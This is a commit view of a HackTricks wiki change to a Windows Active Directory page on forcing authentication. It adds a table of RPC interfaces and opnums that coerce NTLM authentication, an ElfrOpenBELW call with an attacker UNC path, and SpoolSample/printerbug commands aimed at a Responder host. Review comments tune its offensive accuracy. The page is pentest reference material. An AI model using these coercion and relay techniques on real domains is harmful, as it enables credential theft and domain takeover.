Commit f73f3e0

Merge pull request #1568 from HackTricks-wiki/update_You_Thought_It_Was_Over__Authentication_Coercion_K_20251111_063229
You Thought It Was Over? Authentication Coercion Keeps Evolv...
2 parents 7aa035e + 234a108 commit f73f3e0

1 file changed: +53 -8 lines changed

src/windows-hardening/active-directory-methodology/printers-spooler-service-abuse.md

Lines changed: 53 additions & 8 deletions
@@ -36,7 +36,7 @@ rpcdump.py DOMAIN/USER:PASSWORD@SERVER.DOMAIN.COM | grep MS-RPRN
3636
3737
### Ask the service to authenticate against an arbitrary host
3838
39-
You can compile[ **SpoolSample from here**](https://github.com/NotMedic/NetNTLMtoSilverTicket)**.**
39+
You can compile [SpoolSample from here](https://github.com/NotMedic/NetNTLMtoSilverTicket).
4040
4141
```bash
4242
SpoolSample.exe <TARGET> <RESPONDERIP>
@@ -53,12 +53,48 @@ printerbug.py 'domain/username:password'@<Printer IP> <RESPONDERIP>
5353
5454
If an attacker has already compromised a computer with [Unconstrained Delegation](unconstrained-delegation.md), the attacker could **make the printer authenticate against this computer**. Due to the unconstrained delegation, the **TGT** of the **computer account of the printer** will be **saved in** the **memory** of the computer with unconstrained delegation. As the attacker has already compromised this host, he will be able to **retrieve this ticket** and abuse it ([Pass the Ticket](pass-the-ticket.md)).
5555
56-
## RCP Force authentication
57-
58-
59-
{{#ref}}
60-
https://github.com/p0dalirius/Coercer
61-
{{#endref}}
56+
## RPC Force authentication
57+
58+
[Coercer](https://github.com/p0dalirius/Coercer)
59+
60+
### RPC UNC-path coercion matrix (interfaces/opnums that trigger outbound auth)
61+
- MS-RPRN (Print System Remote Protocol)
62+
- Pipe: \\PIPE\\spoolss
63+
- IF UUID: 12345678-1234-abcd-ef00-0123456789ab
64+
- Opnums: 62 RpcRemoteFindFirstPrinterChangeNotification; 65 RpcRemoteFindFirstPrinterChangeNotificationEx
65+
- Tools: PrinterBug / PrintNightmare-family
66+
- MS-PAR (Print System Asynchronous Remote)
67+
- Pipe: \\PIPE\\spoolss
68+
- IF UUID: 76f03f96-cdfd-44fc-a22c-64950a001209
69+
- Opnum: 0 RpcAsyncOpenPrinter
70+
- MS-EFSR (Encrypting File System Remote Protocol)
71+
- Pipes: \\PIPE\\efsrpc (also via \\PIPE\\lsarpc, \\PIPE\\samr, \\PIPE\\lsass, \\PIPE\\netlogon)
72+
- IF UUIDs: c681d488-d850-11d0-8c52-00c04fd90f7e ; df1941c5-fe89-4e79-bf10-463657acf44d
73+
- Opnums commonly abused: 0, 4, 5, 6, 7, 12, 13, 15, 16
74+
- Tool: PetitPotam
75+
- MS-DFSNM (DFS Namespace Management)
76+
- Pipe: \\PIPE\\netdfs
77+
- IF UUID: 4fc742e0-4a10-11cf-8273-00aa004ae673
78+
- Opnums: 12 NetrDfsAddStdRoot; 13 NetrDfsRemoveStdRoot
79+
- Tool: DFSCoerce
80+
- MS-FSRVP (File Server Remote VSS)
81+
- Pipe: \\PIPE\\FssagentRpc
82+
- IF UUID: a8e0653c-2744-4389-a61d-7373df8b2292
83+
- Opnums: 8 IsPathSupported; 9 IsPathShadowCopied
84+
- Tool: ShadowCoerce
85+
- MS-EVEN (EventLog Remoting)
86+
- Pipe: \\PIPE\\even
87+
- IF UUID: 82273fdc-e32a-18c3-3f78-827929dc23ea
88+
- Opnum: 9 ElfrOpenBELW
89+
- Tool: CheeseOunce
90+
91+
Note: These methods accept parameters that can carry a UNC path (e.g., `\\attacker\share`). When processed, Windows will authenticate (machine/user context) to that UNC, enabling NetNTLM capture or relay.
92+
93+
### MS-EVEN: ElfrOpenBELW (opnum 9) coercion
94+
- Interface: MS-EVEN over \\PIPE\\even (IF UUID 82273fdc-e32a-18c3-3f78-827929dc23ea)
95+
- Call signature: ElfrOpenBELW(UNCServerName, BackupFileName="\\\\attacker\\share\\backup.evt", MajorVersion=1, MinorVersion=1, LogHandle)
96+
- Effect: the target attempts to open the supplied backup log path and authenticates to the attacker-controlled UNC.
97+
- Practical use: coerce Tier 0 assets (DC/RODC/Citrix/etc.) to emit NetNTLM, then relay to AD CS endpoints (ESC8/ESC11 scenarios) or other privileged services.
6298
6399
## PrivExchange
64100
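Review bot: in the MS-RPRN entry of the coercion matrix, "Tools: PrinterBug / PrintNightmare-family" conflates two different primitives. The PrintNightmare family abuses driver installation (RpcAddPrinterDriverEx) for RCE/LPE, whereas the coercion this matrix documents is the change-notification calls listed right above it (opnums 62/65), which is what PrinterBug, SpoolSample and printerbug.py drive and what the earlier part of this page already shows. Suggest "Tools: SpoolSample / printerbug.py (PrinterBug)" and dropping the PrintNightmare mention. Second, since the matrix exists to pick a primitive against Tier 0 hosts, each entry should state whether the call is reachable unauthenticated or needs a low-privileged domain account, and the closing note "Windows will authenticate (machine/user context) to that UNC" should say which context each method yields; the ESC8/ESC11 relay described in the MS-EVEN section only works when the coerced authentication is the machine account of the target.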
@@ -137,4 +173,13 @@ If you can perform a MitM attack to a computer and inject HTML in a page he will
137173
If you can capture [NTLMv1 challenges read here how to crack them](../ntlm/index.html#ntlmv1-attack).\
138174
_Remember that in order to crack NTLMv1 you need to set Responder challenge to "1122334455667788"_
139175
140-
{{#include ../../banners/hacktricks-training.md}}
176+
## References
177+
- [Unit 42 – Authentication Coercion Keeps Evolving](https://unit42.paloaltonetworks.com/authentication-coercion/)
178+
- [Microsoft – MS-EVEN: EventLog Remoting Protocol](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-even/55b13664-f739-4e4e-bd8d-04eeda59d09f)
179+
- [Microsoft – MS-EVEN: ElfrOpenBELW (Opnum 9)](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-even/4db1601c-7bc2-4d5c-8375-c58a6f8fc7e1)
180+
- [p0dalirius – windows-coerced-authentication-methods](https://github.com/p0dalirius/windows-coerced-authentication-methods)
181+
- [PetitPotam (MS-EFSR)](https://github.com/topotam/PetitPotam)
182+
- [DFSCoerce (MS-DFSNM)](https://github.com/Wh04m1001/DFSCoerce)
183+
- [ShadowCoerce (MS-FSRVP)](https://github.com/ShutdownRepo/ShadowCoerce)
184+
185+
{{#include ../../banners/hacktricks-training.md}}
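Review bot: the new References list links PetitPotam, DFSCoerce and ShadowCoerce but omits CheeseOunce, which the MS-EVEN entry names as the tool for the ElfrOpenBELW coercion that this change adds a dedicated section for; add an entry for it next to the other tool links so the section is traceable. The same applies to the MS-PAR row, which lists no tool at all while every other row does.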
